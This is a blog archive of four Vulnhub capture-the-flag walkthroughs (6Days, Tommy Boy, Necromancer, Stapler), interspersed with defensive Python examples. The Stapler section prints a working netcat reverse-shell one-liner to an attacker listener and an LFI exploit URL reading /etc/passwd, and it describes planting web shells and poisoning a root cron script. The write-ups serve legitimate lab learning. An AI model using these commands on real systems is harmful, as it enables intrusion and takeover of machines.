Category Archives: ctf

6Days Lab Vulnhub walkthrough – Battling the Rashomon

Vulnhub has been raining VMs lately, a good mix of challenges which keep me on my toes constantly. 6Days lab was an enjoyable VM with a unique twist which had me pulling my hair out late at night.

You can grab the VM here: https://www.vulnhub.com/entry/6days-lab-11,156/

Let’s go!

As always, I started off with an nmap scan. Standard ports 22 and 80 open with a proxy service on port 8080.

Browsing to the web application I was greeted with a page touting the new Rashomon IPS service which would prove to be the bane of my existence for a few days.

Browsing around I noticed the ‘src’ parameter on the image.php page which is attempting to call an image from an external site. I first thought RFI but no, it could not be that easy. Firing up Burp I passed the request to repeater and saw that we were working with an LFI.

I started off by checking out the source of each of the PHP pages I knew existed.

Checkpromo.php was clearly vulnerable to SQL injection on the ‘promocode’ parameter, but we know there is an IDS in place. More on that later.

The index.php and image.php pages were not particularly exciting. Config.php gave me a glimmer of hope but, aside from the dbname, the credentials were not useful.

From the /etc/passwd file I knew that we had 2 users on the system, “user” and “andrea”. Andrea’s shell was set to /bin/andrea. Using our LFI I had a look at this shell script. The readme for the VM mentions sandbox escapes, so here is our “sandbox”. Andrea’s shell is set to rbash and all command output is directed to /dev/null, meaning that she can likely run most commands but, even if they are successful, there will be no feedback on the screen. Evil 🙂.

Back to the web app, we know we are likely dealing with some sort of SQL injection. Flopping around for some time I realized that we can evade the IPS utilizing SSRF to call the checkpromo.php page directly and that we are dealing with a time-based blind SQLi. SQLmap confirmed a time-based blind SQLi for the ‘promocode’ parameter. This was confirmed after attempting all upper and lowercase characters and receiving a 5 second delayed response on “S”, meaning that a password likely started with an “S”. All initial attempts with SQLmap and tamper scripts would not return any data. This was likely due to the size of the payloads being used as well as the proxy.


At this point we needed to be able to exploit the SSRF + SQLi with SQLmap (time-based blind SQLi by hand is something I need to work on).

With Burp to the rescue, we are able to set up a match/replace rule to automatically call the vulnerable URL via SSRF.

Chatting with @GKNSB for quite some time we realized that double URL encoding was needed, but only for certain special characters. While I tried to achieve this with some crazy Burp rules (unsuccessfully) @GKNSB whipped up this awesome custom SQLmap tamper script which worked flawlessly.
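The IPS-evasion observation above also says what a detection layer has to do about it. The following is an added example, not code from the post, from the Rashomon IPS or from @GKNSB's tamper script: it models an inspector that URL-decodes once against one that decodes to a fixed point, run on a constructed promocode value in which only the quote and parentheses are double-encoded. The signature list is constructed and deliberately tiny.

```python
"""Defender-side normalisation of URL-encoded request parameters.

Added example (not code from the walkthrough or from the Rashomon IPS).
An IPS that inspects a parameter after a single round of URL decoding can
be bypassed by double-encoding only a few special characters; decoding to
a fixed point before matching closes that gap, and the number of decoding
layers is itself a signal, since normal clients encode exactly once.
"""
import re
from typing import Tuple
from urllib.parse import unquote

# Constructed, deliberately small signature list for time-based blind SQLi
# markers, matched case-insensitively on the decoded value.
TIME_BASED_SIGNATURES = [
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
    re.compile(r"\bwaitfor\s+delay\b", re.I),
]

# Constructed sample: only the quote and the parentheses are double-encoded
# (%2527 -> %27 -> '), everything else is encoded once, mirroring the
# "only for certain special characters" observation in the post.
SAMPLE_PROMOCODE = "ABC%2527%20AND%20sleep%25285%2529--%20"


def decode_to_fixed_point(value: str, max_rounds: int = 5) -> Tuple[str, int]:
    """URL-decode repeatedly until the string stops changing.

    Returns (decoded_value, rounds), where rounds counts how many decoding
    passes actually changed the input. max_rounds bounds pathological input.
    """
    rounds = 0
    current = value
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def matches_signature(value: str) -> bool:
    """True if any constructed signature matches the (decoded) value."""
    return any(sig.search(value) for sig in TIME_BASED_SIGNATURES)


def inspect_single_decode(value: str) -> bool:
    """Model of a naive IPS: one unquote() pass, then signature match."""
    return matches_signature(unquote(value))


def inspect_full_decode(value: str) -> dict:
    """Hardened check: decode to a fixed point, then match.

    More than one effective encoding layer is reported as suspicious on its
    own, because browsers and well-behaved clients encode exactly once.
    """
    decoded, rounds = decode_to_fixed_point(value)
    return {
        "decoded": decoded,
        "encoding_layers": rounds,
        "suspicious": matches_signature(decoded) or rounds > 1,
    }


if __name__ == "__main__":
    print("single-decode IPS flags it:", inspect_single_decode(SAMPLE_PROMOCODE))
    print("fixed-point check:         ", inspect_full_decode(SAMPLE_PROMOCODE))
```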

Armed with this tamper script and knowledge of the database name I was quickly able to pull out Andrea’s password.

And our password.

Armed with the goods I was able to SSH in, directly into the rbash shell 🙂.

There are other ways to do this but I just took the opportunity to throw myself another shell as www-data to be able to look around the file system freely.

There was a custom binary ‘dog’ in Andrea’s home directory.

I pulled it down with netcat and had a look.

I was not able to fully exploit it as reversing is an area that I am still working on but did find that the dog file expected to be fed a file owned by a user with UID 1001 and would print the contents, otherwise an “Access Denied” message is printed (with some assistance and prodding from @sizzop who always keeps me on my toes).

Main makes a call to stat() (which returns a file’s status, including owner UID and GID, size and timestamps). After calling stat, main checks 2 fields back to back to make sure they are both ‘3E9h’. Highlighting and pressing the ‘H’ key in IDA converts the hex to ‘1001’, confirming that the call to stat() is checking for a file with UID and GID 1001:1001; if the file is owned by that user it will print out “Access Granted” and make a call to readfile() which prints the contents of the file.

To test this I created a test file locally, owned by a user with UID and GID 1001.

Running the dog binary against this confirmed what we have found.

At this point I went back to the VM, thinking that this binary would be useful in reading a file such as /etc/shadow. This did not work which made me think there is a missing piece in using this binary for privilege escalation that I will have to dig into further. I was able to obtain root privileges using a kernel exploit, which is my least favorite method but still got the job done.

And we have our flag.

Shout-out to @1ce7ea for an awesome challenge, @GKNSB for the tamper script which saved me lots of pain, @sizzop for another quick lesson in reversing, and @g0tmi1k for continuing to keep the vulnhub community going.

Tommy Boy:1 vulnhub walkthrough

I saw @7minsec discussing testing going on for his upcoming Tommy Boy VM a few weeks back. I was eagerly awaiting the release of this one as Tommy Boy was a classic movie from my childhood and any VM involving Chris Farley would have to be full of trolls…I was right.

You can grab the VM here: https://www.vulnhub.com/entry/tommy-boy-1,157/

Note from the author:

The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.

Let’s go!

Started off with an nmap scan of all ports which returned SSH and 2 Apache servers, one running on a non-standard port.

Browsing to port 80 to start I was greeted with the Callahan Auto page which apparently was experiencing some technical difficulties.

A look at the page source provided me my first introduction to Nick Burns as well as some hints.



I also started compiling a list of possible usernames for later.

I also grabbed flag 1!

I pulled down all the image files and checked them with exiftool for any hidden treasures but came up short.

AHH! Where to now? Oh yeah, the YouTube link in the page source.

Prehistoricforest seemed like a good candidate for our hidden directory…and we’re in! I was greeted by the Callahan Employee Blog on WordPress with 1 protected post and various other posts strewn about.

While here I stopped to grab the second flag.


This Nick Burns character was great, hurling insults while trolling me. Nice touch by the author.

I browsed to the /richard directory and was greeted with an image. This time a look with exiftool gave me a clue.

I threw the md5 hash into md5cracker and got a quick result: spanky.

Heading back to the blog I was able to use this password to access the protected post and was greeted with a wealth of information and lots of snark from Nick Burns.


At this point I was able to surmise that down the road I would be able to SSH in as Big Tom (username to be determined) and that an FTP server was running on a non-standard port which opened for 15 minutes at the top of the hour and then went down for 15. Nice troll by the author.

I had to wait a bit for the top of the hour and then fired off another nmap scan which showed that port 65534 was now open 🙂

I confirmed it was indeed the Callahan FTP Server.

I tried various brute force attacks but nothing was working, also the port kept going down for me. I slapped together a quick script to monitor the port while I poked around the web server some more.

After a while my little script told me to get back to the FTP.

Since Nick Burns seemed to be an abysmal IT admin I took a guess that he may re-use his username as his password. Trying nickburns:nickburns granted me access!

There was one file accessible and I was restricted to the FTP root directory. Taking a look at the readme I was presented with some additional clues.

I hunted for this directory for a while on port 80 then remembered the nmap scan. For some reason I had seen 8080 earlier, tried that and when it did not connect I gave up. Browsing to I was greeted with another nice message from Nick and a reference to Steve Jobs.

This one threw me for a bit but I remembered that Burp has the ability to change your user-agent (you can do this within the browser as well). However, I have used this particular feature before on client assessments to replace my user-agent with different payloads in an attempt to inject JavaScript into any logs that may be available on an admin portion of the application (so far it has worked once in the last year 🙂).

Well I passed the dummy test! But Nick Burns is not a gracious man.

So I needed to find a certain .html file using the iOS user-agent from earlier. Dirbuster can do this!

I set up dirbuster with the rockyou.txt wordlist and let it rip.

After a bit I was thrown a result: fallon1.html.

Browsing to this page I was given a hint, the third flag and a password protected zip.

Oh hey flag 3!

The hint broke down for us how Nick Burns chose the password for his password vault.

Based on the specific parameters given, another built-in Kali tool, Crunch, can help us generate a custom word list for brute forcing.

I laughed when I saw 58 million combinations.

Our tool of choice for brute forcing a password protected zip is fcrackzip. I fired this up with our new 58 million strong word list and waited and hoped for a hit.

After a while I got what I came for.

I opened up the zip file and was greeted with more clues and trolls.

This next part threw me for a loop for a while. I had to get into the wp-admin portal to continue.

The clue was a Queen song. I checked the Tommy Boy soundtrack and there were no Queen songs in the movie. I made several wordlists, one using the names of the top 30 Queen songs on google and mangling them up with l33t rulesets. Nothing. I then used Cewl to create a massive word list using the lyrics from a few well known songs. All these lists against the wp-admin page with my 4 users (tom, richard, tommy, michelle) got me nothing.

I grabbed a couple beers and thought some more on this. Stumped I gave one last effort with rockyou.txt. It had worked earlier so why not.

Firing up WPScan and I had my result quickly.

Thinking back now the clue was right in front of me (We Will Rock You was the Queen song). Great troll and props to the author. Sometimes we don’t notice what is right in front of us 🙂

I signed in to the company blog and found a post in the “drafts” folder.


This draft post gave me what I needed to complete Big Tom’s password and (hopefully) get in via SSH.

bigtommysenior:fatguyinalittlecoat1938!! and we’re in!

Scooped up flag 4.

Remembering back from the initial instructions I knew I had to restore the backup of the website.

First task accomplished!

Looking around the file system a bit I found what I believed to be flag 5. But the odd part was that it was owned by www-data and not readable. Ugh!

Looking around the file system some more I found some world writeable directories including one very interesting one.

My first attempt to upload a .php file was rejected so I changed the file name to upload an image file.

This one was accepted!

Since I had access to the server I was able to just rename the .jpg file to a PHP file and get a reverse shell as www-data user.

I proceeded to grab flag 5 and was greeted with one last task.

I threw together all of the flags into the following string and was able to unzip the LOOT.zip file.

Here comes the meat wagon!

Awesome first VM by @7minsec. I always enjoy the VMs that follow a story and keep you on a set path. This one was lighthearted, fun and had the right mix of trolls and some quick wins to keep you motivated. A great addition to Vulnhub and I look forward to the sequel!

Shout-out to @g0tm1lk as always for continuing to maintain this great learning community.

-mrb3n

Necromancer vulnhub walkthrough

New images have been popping up on vulnhub.com left and right, I can hardly keep up. When I saw the latest, The Necromancer by @xerubus, I knew by the title I had to give this one a shot. The description stated that this was more of a CTF type box with 11 total flags.

Download link: https://download.vulnhub.com/necromancer/necromancer.ova

Part way through this one I linked up with @cmaddalena and we commiserated and bounced ideas off each other. We were both stuck at flag 4 for quite some time.

Let’s go!

This one started off like any other: imported the image, booted it up and kicked off an nmap scan once I grabbed its IP. Except the first scan did not return any open ports, and neither did the second, or the third. OK, something was blocking/trolling me. I toyed with various scans and only once I threw UDP in the mix did I receive any type of result.

I connected to port 666 and received the message ‘You Gasp for air! Time is running out!’

I toyed with this for a while, even crashing the service and having to restart the VM…not the first time.

Flag 1

I decided to move on for now and fired up Wireshark and noticed that the VM was making ARP requests out to every IP in the subnet, interesting. Perhaps some ARP poisoning? I opened up ettercap to get a better view and could see the machine was calling out to port 4444 on every machine in the subnet. I started up a listener and received my first sign of life.

Hmm, a huge base64 encoded string. I grabbed it, decoded it and was presented with the following message and my first flag!

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right! You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”

The MD5 hash cracked to ‘opensesame’.

Flag 2

I had already thrown various things at port 666 so I ventured a guess with the string from flag 1, and got my 2nd flag!

Flag 3

Based on the information in flag 2, I surmised that port 80 had opened. Visiting it I was presented with the following page:

I checked the page source, nothing, fired off Burp to spider the app and pulled down the image file. Checking the exif data returned nothing useful. Running strings on the file got me the following info, which told me there was likely a ‘feathers.txt’ file embedded within the image.

I could have used Foremost or Binwalk here too but for some reason decided to convert it to a zip file and unzip it; it worked!
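Renaming the image to .zip worked because the archive was simply appended after the JPEG data, which is also what `strings` and Binwalk pick up on. The following is an added example, not code from the walkthrough: it locates the ZIP local-file-header signature after the image bytes, validates that the archive really starts there (a decoy “PK” sequence inside the pixel data is rejected), and extracts and base64-decodes the embedded text. The image bytes, the archive and the feathers.txt contents are all constructed for the demo.

```python
"""Find and extract an archive appended to an image file.

Added example, not code from the walkthrough. The sample image, the
embedded archive and the contents of feathers.txt are constructed here.
"""
import base64
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # signature of a ZIP local file header
JPEG_SOI = b"\xff\xd8\xff"          # JPEG start-of-image marker
JPEG_EOI = b"\xff\xd9"              # JPEG end-of-image marker
MAX_MEMBER_SIZE = 1 << 20           # refuse to inflate anything over 1 MiB


def find_embedded_zip(data: bytes) -> int:
    """Return the offset where an appended ZIP archive begins, or -1.

    Every 'PK\\x03\\x04' occurrence is tried. Python's zipfile tolerates
    leading junk, so the slice is only accepted when the first central
    directory entry's local header sits at offset 0 of the slice, i.e. the
    candidate is the true start of the archive, not a spurious 'PK' inside
    compressed pixel data.
    """
    offset = data.find(ZIP_LOCAL_HEADER)
    while offset != -1:
        try:
            with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
                entries = zf.infolist()
                if entries and entries[0].header_offset == 0:
                    return offset
        except zipfile.BadZipFile:
            pass
        offset = data.find(ZIP_LOCAL_HEADER, offset + 1)
    return -1


def extract_embedded(data: bytes) -> dict:
    """Return {member_name: bytes} for the appended archive, {} if none."""
    offset = find_embedded_zip(data)
    if offset == -1:
        return {}
    members = {}
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        for info in zf.infolist():
            if info.file_size > MAX_MEMBER_SIZE:
                continue  # size cap: untrusted archives may be bombs
            members[info.filename] = zf.read(info)
    return members


def recover_clue(data: bytes) -> str:
    """Full pipeline: locate the archive, read feathers.txt, base64-decode."""
    members = extract_embedded(data)
    if "feathers.txt" not in members:
        return ""
    return base64.b64decode(members["feathers.txt"]).decode()


def build_sample_image() -> bytes:
    """Constructed stand-in for the CTF image.

    A minimal JPEG-looking blob (with a decoy 'PK\\x03\\x04' inside the
    "pixel data") followed by a real ZIP containing feathers.txt whose
    content is a base64-encoded placeholder clue.
    """
    fake_jpeg = (JPEG_SOI + b"\xe0" + b"\x00" * 64
                 + ZIP_LOCAL_HEADER + b"\x00" * 16   # decoy signature
                 + JPEG_EOI)
    clue = b"flag3{CONSTRUCTED_PLACEHOLDER} next stop: /constructed_path"
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("feathers.txt", base64.b64encode(clue).decode())
    return fake_jpeg + archive.getvalue()


if __name__ == "__main__":
    sample = build_sample_image()
    print("archive starts at offset", find_embedded_zip(sample))
    print("members:", list(extract_embedded(sample)))
    print("clue:", recover_clue(sample))
```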

Once I decoded the base64 I was rewarded with flag 3 and another URL, time to cross the chasm.

Flag 4

Oh flag 4, how you haunted me. I spent way too long on this, way, way too long. Finally, after a hint from the author Xerubus that I was looking for something at this URL, I made a custom word list from all the ‘magic items’ I could find out on Google related to necromancers, necromancy and sorcerers. Two of the sites I grabbed info from with Cewl were: http://www.tribality.com/2015/11/02/dd-5e-magic-item-guide/ and http://www.d20srd.org/indexes/magicItems.htm

Running Cewl to create the Wordlist

I set this up in Burp Intruder since Dirbuster was giving me schedule results and timing out often.

A snippet of some of the requests, all resulting in ‘404’ statuses. I didn’t bother to clean up the word list so there was a lot of junk in there.

Eventually I got a hit on ‘talisman’

The file itself was a binary. At first I was disappointed. Binary exploitation is an area that I am still quite weak in, but I need to practice on. After fumbling around for a number of hours I noticed 2 functions ‘wearTalisman’ and ‘chantToBreakSpell’. I spun my wheels for a bit and reached out to @sizzop who is a binary wizard. He threw me a few ideas and some light reading on gdb. After some more fumbling I was successful in setting a breakpoint at the ‘wearTalisman’ function (since this function did not actually reference the ‘chantToBreakSpell’ function and was not going to give me anything no matter how much I begged). Once this was done I ran the program again and, once it hit the breakpoint I set earlier, I directed it to jump directly to the ‘chantToBreakSpell’ function. Here I was greeted with flag 4 and my next clue.

This made me realize that I need to finally go back and work through as many of the binary challenges as I can stomach. It’s all about being well-rounded.

Flag 5

The MD5 hash from flag 4 cracked to ‘blackmagic’. I fed this to UDP port 31337 and got my next flag! And another clue.

Flag 6

Browsing to the URL from flag 5 I was greeted with a friendly Necromancer as well as flag 6. Things were starting to heat up.

I was also presented with a download link that turned out to contain a pcap (Wireshark packet capture) file as well as our next clue, UDP port 161. SNMP?

Flag 7

I loaded the pcap up in Wireshark and was presented with WPA encrypted wireless traffic, interesting. Wireless is another area that I don’t have much experience in.

Google led me to an article about cracking WPA passphrases with aircrack-ng. I set everything up, and fired rockyou.txt at the file.

I had a result, ‘death2all’, relatively quickly.

Next I followed a similar method that I have used to decrypt SSL with a private key, but this time to decrypt the wireless traffic.

I poured over the pcap for a while and nothing really jumped out to me except for the SSID name ‘community’. Perhaps this was a hint to look further into SNMP which was referenced on the webpage from flag 6?

I did a bit of reading as a refresher on SNMP (http://cuddletech.com/articles/snmp/node13.html) and tried my luck with snmpwalk, using ‘death2all’ as the community string.

I was presented with some very promising results and headed back to Google.

“The door is Locked. If you choose to defeat me, the door must be Unlocked.” After some light reading (http://net-snmp.sourceforge.net/wiki/index.php/TUT:snmpset) I determined that I could likely edit the string values. I gave it a shot with snmpset, first trying “The door is Unlocked” but did not receive a positive result. Interpreting the earlier message literally I set the string to just ‘Unlocked’ and was rewarded with flag 7 and my next hint: TCP port 22. Time to SSH in and face the Necromancer?

This part was really well done and a unique twist from any of the CTFs I’ve done.

Flag 8

The MD5 hash from flag 7 cracked to ‘demonslayer’. I confirmed that port 22 was open and proceeded to try a bunch of combinations of logins with ‘demonslayer’ set as both the username and the password.

Once I realized I was getting nowhere fast I decided to give brute forcing a try with Hydra. Logically, ‘demonslayer’ was likely the username so I combined that username with the rockyou.txt wordlist and had a result pretty quickly.

Logging in as ‘demonslayer’ I was presented with a smiling face. The Necromancer! At last we meet!

Once logged in I had to contain myself and remember this was meant to be a CTF, not necessarily a challenge to get root. I had to find the next flag. Checking demonslayer’s home directory I had my prize and another clue, time to meet the Necromancer face-to-face on UDP port 777.

I first tried to connect remotely, but that didn’t make sense. I was in the Necromancer’s lair after all. I had to fight him there.

Connecting to port 777 locally started the final phase. A notice appeared that I had 3 hitpoints, in this case meaning that after 3 incorrect answers my connection was dropped and I had to re-do the entire scenario to get back to this point. Good thing I had good notes and this only happened once.

For flag 8 I went out to wikipedia (https://en.wikipedia.org/wiki/Tsurani)

Flag 9

I was not familiar with any of these references so I turned to Google once again, the following link got me my answer for flag 9: http://www.liquisearch.com/spirit_of_fire/supporting_characters/johann_faust_viii

Flag 10

At this point I was sweating profusely (I’ll blame the Florida heat) and exhausted. However, the end was in sight and there was no way I was giving up without my prize.

Thank you Google (https://en.wikipedia.org/wiki/List_of_Old_Kingdom_characters) and, flag 10!

Flag 11

I flopped around for a while, then, looking at the problem logically again, checked for hidden files.

Once again I was stuck, due to brain meltdown I had no idea what this final clue was. Had I come this far to not get the final flag? I enumerated the entire file system looking for the flag and eventually came back and re-read the clue. “Great power in your veins”… as in root power? I tried to su to root with demonslayer’s password and was denied. Sigh. Surely this clue meant something, perhaps I could run something as root? Yes I could!

Demonslayer could cat out the final flag hidden in root’s home directory.

The Necromancer was slain. Wow, what a great feeling. I always enjoy vulnhub challenges but completing this one was a special feeling. This CTF pushed and pulled me in all directions, made me step outside of my comfort zone, and showed me where my deficiencies are, all while being a ton of fun.

Props to @xerubus for creating this unique and interesting challenge.

As always thanks to @g0tmi1k for maintaining vulnhub as well as everyone in the vulnhub community for continuing to produce these valuable teaching tools.

Until next time!

Stapler: 1 walkthrough (long version)

I decided to take a break from working on the Breach series, partially from burnout and partially due a lack of ideas for finalizing part 3. I took the opportunity to work through g0tmi1k’s Stapler that he put together for the BsidesLondon 2016 Vulnhub workshop. Below I’ll go through 5 ways to achieve a local shell (some dirty/cheap shots but I figured I’d write them up regardless) and 3 separate ways to escalate to root.

You can grab the files here: https://download.vulnhub.com/stapler/Stapler.zip

I. Discovery

I imported the VM and grabbed the IP using netdiscover (you’ll notice I switch to 192.168.110.157 later on as I forgot to set the HDD to non-persistent and rendered the VM, well, unresponsive).

I followed up with an nmap scan and uncovered some interesting services. A full port scan gave me some issues so I ran the top 1000, then top 5000 before digging in.

I also performed a UDP scan and found a few more interesting services (more on that later).

I started by checking the FTP and SSH services. I was able to log in anonymously to the FTP. Along the way I grabbed the banners and a note file.

At this point I started a user list as it appeared that the users Harry, Elly, Barry and John may be valid users on either a web app or the system itself.

Port 80 gave me a ‘Not Found’ error and subsequent enumeration with Burp and dirbuster did not uncover any usable pages.

Following up on port 139, I ran enum4linux which came in handy often in the Offsec PWK labs.

The results are truncated here but I found some shares (including 2 more possible usernames Kathy and Fred).

…and what I was looking for, a full listing of local users.

I fumbled around for a bit, checking for anything useful on port 80 and attempted to authenticate remotely via MySQL without success. I checked out port 12380 via the web browser and found some sort of web app running. The page source had a comment which I saved for later, again confirming another possible user.

I ran Burp and Nikto against port 12380 and received inconclusive results showing a robots.txt file with entries for ‘blogblog’, ‘admin112233’, and ‘phpMyAdmin’. The Nikto results gave me another clue “the site uses SSL…”

Changing over to https I finally had something useful to work with.

Oh hey, a WordPress blog 🙂

I fired up WPscan and enumerated a bunch of usernames (some which I had gathered earlier).

Based on the listing john appeared to be the site admin so I went to work brute forcing his password and grabbed a beer (or 3).

It took a bit but rockyou.txt found the password – john:incorrect.

I attempted to replace the 404.php template with a PHP reverse shell off the bat but was unable to edit the themes. I flopped around for a bit and decided to go check out the Samba shares.

Using John’s password I checked out the ‘tmp’ and ‘kathy’ shares.

The shares held some notes and a WordPress backup. I grabbed the WordPress backup to check for anything useful in the config but it appeared to be a backup of the stock configuration, not the actual site.

II. Exploitation (Local access)

I will go through 5 ways to achieve local access. Some are not purely independent of other issues and some are a bit “dirty” but we’re all about learning here.

1) PHP reverse shell upload via WordPress plugin upload page.

The file upload function on WordPress would not accept PHP or any bypasses that I attempted so I gave the plugin upload a shot. Since directory listing was enabled on /wp-content/uploads I was able to check if my attempts were successful.

2) Shell upload via TFTP over UDP.

I noticed a tftp service running on UDP port 69 early on and attempted an upload. You cannot perform a directory listing, but turning on verbose mode it appeared that my upload was successful and perhaps had uploaded directly to the web root on port 80?

I fired up a listener, browsed to where I thought the file was uploaded and got a connection back, nice!

3) SSH Brute Force

Brute forcing is not stealthy and could result in account lockout in the real world. We don’t have to worry about that here so here goes. I made a wordlist of all the user names I had gathered so far and first tried with rockyou.txt. It ran for a while and didn’t uncover anything so I gave it another shot re-using the usernames as passwords. After a bit I got a hit on SHayslett.

4) WordPress Advanced Video Plugin Local File Inclusion (LFI) + Shell via MySQL Remote Authentication

The Advanced Video Plugin is vulnerable to an LFI vulnerability which can be used to read files on the local file system.

There is an exploit on exploit-db which must be fixed up to run properly: https://www.exploit-db.com/exploits/39646. The exploit does not require an authenticated admin session, doh!, and will read the contents of a local file and save it as a .jpeg image in the /wp-content/uploads directory. The POC goes after the wp-config.php file. More on that later. I first grabbed the /etc/passwd file to confirm it worked.

https://192.168.110.157:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../../../../../etc/passwd

I then got greedy and went after /etc/shadow and was denied.

I also attempted to read /var/log/access.log and /var/log/auth.log in an attempt to leverage the LFI to perform Apache log poisoning and get a web shell, but was denied access to these files as well. I spent a while trying to grab files down until I remembered the POC and went after the wp-config.php file.

Now we’re getting somewhere, MySQL DB root credentials.

I was able to access the MySQL instance remotely and spent a long time enumerating the database. After spinning my wheels reading DB tables I decided to try writing out a small PHP web shell using dumpfile. I had grabbed a user listing but that’s about it.

I knew the /wp-content/uploads directory was writeable and with previous SSH access confirmed that the webroot was changed to /var/www/https (I wish I could say I guessed that).

I started up another listener and got a connection back! Careful with those WordPress plugins (I say this as I write this on a WordPress blog).

5) phpMyAdmin Direct Database Access

Using the credentials from part 4 I was able to access the phpMyAdmin console. Access did depend on the info gathered from the LFI but was independent of the MySQL instance allowing remote connections. Following a similar method, I wrote out a web shell.

Browsing to the file, as with part 4, I did not get any feedback from running commands such as /phpmyadmin_shell.php?cmd=whoami; however, I was able to obtain a reverse shell connection using mknod (the redirection characters were stripped from the original post by the page formatting; the standard form of the command is shown here):

mknod /tmp/backpipe p; nc 192.168.110.129 8444 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

III. Privilege Escalation

I found 3 ways to escalate privileges and 1 nice troll which had me spinning my wheels for a while (thanks g0tmi1k!!).

1) Sudo group membership

After obtaining local access, I began enumerating the file system. I noticed that root was running a Python simple HTTP server from /home/JKanode so I went over to check out what else may be hiding in this directory. There was nothing there, but the user forgot to clear their bash history before logging out.

Using these credentials I decided to log in via SSH directly as ‘JKanode’ and ‘Peter’. Logging in with JKanode first I enumerated the file system for a long time (more to come on that). Logging in with ‘Peter’ gave me my first win. Peter is in the sudo group! Entering the command ‘sudo -i’ I was able to gain root privileges.

2) Linux Kernel 4.4.x (Ubuntu 16.04) – double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit

This particular kernel version appeared to be vulnerable to the following kernel exploit: https://www.exploit-db.com/exploits/39772/

I pulled the file over, unzipped, compiled and it ran out of the box.

A quick and easy way to root, though not my favorite as it is basically point and click.

3) World Writeable Cron Script Owned by Root

The final method is by abusing the cron-logrotate.sh script. It was set to run every few minutes (I believe, I forgot to check the frequency).

I logged in via SSH as SHayslett, echo’d a mknod reverse shell to the cron-logrotate.sh script, set up a listener and went chasing trolls.

I checked back a bit later and had a connection back as root. Awesome!
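The cron-logrotate.sh method works only because a script that root's cron executes was writable by everyone, so the defender's check is to audit exactly that. The following is an added example, not code from the walkthrough or from the Stapler VM: it walks the given cron directories and reports files and directories writable by group or other, symlinked entries, and entries not owned by the expected uid. The demo tree it builds (with a constructed cron-logrotate.sh) is a fixture so it runs anywhere; point `audit()` at DEFAULT_CRON_DIRS on a real host.

```python
"""Audit cron-driven scripts for write access by non-root users.

Added example, not from the walkthrough. Any local user can append
commands to a root-run cron script that is world-writable, so this
checker flags loose modes, unexpected owners and symlinks under the
directories it is given. The demo tree is constructed for the example.
"""
import os
import stat
import tempfile
from typing import Dict, List

# Default places where root-executed scripts live on a Debian/Ubuntu box.
DEFAULT_CRON_DIRS = ["/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
                     "/etc/cron.weekly", "/etc/cron.monthly"]


def current_uid() -> int:
    """UID of the auditing process (used by the demo as the expected owner)."""
    return os.getuid()


def classify(path: str, expect_owner_uid: int = 0) -> List[str]:
    """Return a list of findings for one path; an empty list means clean."""
    findings = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return [f"{path}: missing"]
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{path}: symlink (whoever owns the link can re-point it)")
        try:
            st = os.stat(path)  # follow it for the permission checks below
        except FileNotFoundError:
            findings.append(f"{path}: dangling symlink")
            return findings
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({oct(mode & 0o777)})")
    elif mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append(f"{path}: group-writable by gid {st.st_gid}")
    if st.st_uid != expect_owner_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {expect_owner_uid}")
    return findings


def audit(paths: List[str], expect_owner_uid: int = 0) -> Dict[str, List[str]]:
    """Audit every directory and regular file under the given roots.

    Directories are checked too: a writable directory lets a user replace
    the script even when the script's own mode is strict.
    """
    report: Dict[str, List[str]] = {}
    for root in paths:
        if not os.path.isdir(root):
            continue
        for dirpath, _dirnames, filenames in os.walk(root):
            for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                findings = classify(path, expect_owner_uid)
                if findings:
                    report[path] = findings
    return report


def make_demo_tree() -> str:
    """Constructed fixture: a fake cron directory holding one properly
    locked script and one writable by everyone (the cron-logrotate.sh
    pattern from the post). Returns the directory path."""
    base = tempfile.mkdtemp(prefix="cron-audit-demo-")
    os.chmod(base, 0o755)
    locked = os.path.join(base, "locked.sh")
    loose = os.path.join(base, "cron-logrotate.sh")
    for script in (locked, loose):
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\n# placeholder body\n")
    os.chmod(locked, 0o755)
    os.chmod(loose, 0o777)
    return base


if __name__ == "__main__":
    demo = make_demo_tree()
    for path, issues in audit([demo], expect_owner_uid=current_uid()).items():
        for issue in issues:
            print(issue)
```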

IV. Trolls

There were many notes and comments scattered out throughout the file system (SSH banner, FTP banner, Samba config, various files) that kept me chasing down leads that didn’t amount to anything.

One troll that had me running around for a while was what was running on port 666. It turned out to be a small shell script running from /usr/local/src. The script itself just served up the file ‘nc.zip’ upon successful connection. The zip file contains an image, which has 2 MD5 hashes in the exif data with a comment: “If you are reading this, you should get a cookie!” Haha, thanks guys.

The image itself was just a screenshot of the nc.txt file within the same directory.

And the hashes

V. Closing

